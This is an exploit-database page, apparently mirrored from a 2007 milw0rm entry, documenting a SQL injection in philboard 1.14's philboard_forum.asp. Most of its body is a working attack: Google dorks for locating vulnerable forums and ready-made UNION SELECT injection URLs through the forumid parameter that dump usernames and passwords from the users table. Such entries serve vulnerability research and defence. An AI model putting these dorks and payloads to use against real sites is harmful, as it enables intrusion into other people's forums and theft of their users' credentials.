[] NeoSense
E X P L O I T S
title author type platform port cve id

philboard 1.14 - 'philboard_forum.asp' SQL Injection

Author: Mehmet Ince
type: webapps
platform: asp
port: nan
date_added: 2007-02-11 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-35678;CVE-2007-0920 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphilforumtr.zip
----------------------------------------------------

Philboard (id) Remote SQL Injection

----------------------------------------------------

Bulan: xoron

xoron.info - xoron.biz

Google Dork : "Powered by Philboard" , "inurl:philboard_forum.asp"

----------------------------------------------------

Exploit: philboard_forum.asp?forumid=[SQL]

----------------------------------------------------

Example:

Username
philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

Password
philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

----------------------------------------------------

Forum: username + password

----------------------------------------------------

Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ýndirmek için týklayýn" .

----------------------------------------------------

# milw0rm.com [2007-02-12]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.